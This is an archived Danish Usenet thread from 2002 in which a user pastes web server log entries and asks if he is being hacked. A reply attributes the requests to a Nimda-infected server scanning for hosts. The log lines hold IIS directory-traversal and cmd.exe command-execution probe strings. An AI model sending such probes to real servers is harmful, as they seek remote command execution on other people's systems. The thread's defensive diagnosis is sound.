/
Forside
/
Teknologi
/
Internet
/
Sikkerhed
/
Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn
*
Kodeord
*
Husk mig
Brugerservice
Kom godt i gang
Bliv medlem
Seneste indlæg
Find en bruger
Stil et spørgsmål
Skriv et tip
Fortæl en ven
Pointsystemet
Kontakt Kandu.dk
Emnevisning
Kategorier
Alfabetisk
Karriere
Interesser
Teknologi
Reklame
Top 10 brugere
Sikkerhed
#
Navn
Point
1
stl_s
37026
2
arlet
26827
3
miritdk
20260
4
o.v.n.
12167
5
als
8951
6
refi
8694
7
tedd
8272
8
BjarneD
7338
9
Klaudi
7257
10
molokyle
6481
Hacker eller hvad ??
Fra :
Anders
Dato :
06-03-02 12:32
Jeg sider og leje lidt med en sambar webserver, som ikke er tilmeldt nogen
steder, efter 10 min står der pludselig dette i loggen: Er det ikke en som
har forsøgt at hacke min server ???
[06/Mar/2002:12:22:05 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0
"-" "-"
[06/Mar/2002:12:22:06 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0
"-" "-"
[06/Mar/2002:12:22:06 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 0 0 "-" "-"
[06/Mar/2002:12:22:06 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 0 0 "-" "-"
[06/Mar/2002:12:22:06 +0100] "GET
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
[06/Mar/2002:12:22:06 +0100] "GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 0 0 "-" "-"
[06/Mar/2002:12:22:07 +0100] "GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 0 0 "-" "-"
[06/Mar/2002:12:22:07 +0100] "GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+
dir HTTP/1.0" 404 0 0 "-" "-"
[06/Mar/2002:12:22:07 +0100] "GET
/scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
[06/Mar/2002:12:22:07 +0100] "GET
/scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
[06/Mar/2002:12:22:07 +0100] "GET
/scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
[06/Mar/2002:12:22:07 +0100] "GET
/scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
Lars Kyndi Laursen (
06-03-2002
)
Kommentar
Fra :
Lars Kyndi Laursen
Dato :
06-03-02 12:53
On 06 mar 2002 Anders enriched usenet with:
> Jeg sider og leje lidt med en sambar webserver, som ikke er
> tilmeldt nogen steder, efter 10 min står der pludselig dette i
> loggen: Er det ikke en som har forsøgt at hacke min server ???
SNIP log
Det er en server inficeret med Nimda, der leder efter andre sårbare
servere.
Dette svar kunne også findes blandt de ti første resultater ved en
søgning efter cmd.exe på Google
--
Lars Kyndi Laursen, representatum nixi
Si fractum non sit, noli id reficere
Søg
Alle emner
Teknologi
Internet
Sikkerhed
Indstillinger
Spørgsmål
Tips
Usenet
Reklame
Statistik
Spørgsmål :
177552
Tips :
31968
Nyheder :
719565
Indlæg :
6408847
Brugere :
218887
Månedens bedste
Årets bedste
Sidste års bedste
Copyright © 2000-2024 kandu.dk. Alle rettigheder forbeholdes.